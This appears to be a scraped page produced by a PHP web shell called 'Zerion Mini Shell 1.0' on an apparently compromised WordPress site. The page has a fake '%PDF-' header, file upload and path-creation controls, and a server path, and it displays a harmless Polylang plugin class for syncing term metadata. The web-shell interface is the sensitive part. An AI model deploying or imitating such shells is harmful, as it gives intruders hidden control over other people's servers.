%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/dopla/www/wp-content/plugins/polylang/modules/sync/
Upload File :
Create Path :
Current File : /home/dopla/www/wp-content/plugins/polylang/modules/sync/sync-term-metas.php

<?php

/**
 * A class to manage copy and synchronization of term metas
 *
 * @since 2.3
 */
class PLL_Sync_Term_Metas extends PLL_Sync_Metas {

	/**
	 * Constructor
	 *
	 * @since 2.3
	 *
	 * @param object $polylang
	 */
	public function __construct( &$polylang ) {
		$this->meta_type = 'term';

		parent::__construct( $polylang );
	}
}

Zerion Mini Shell 1.0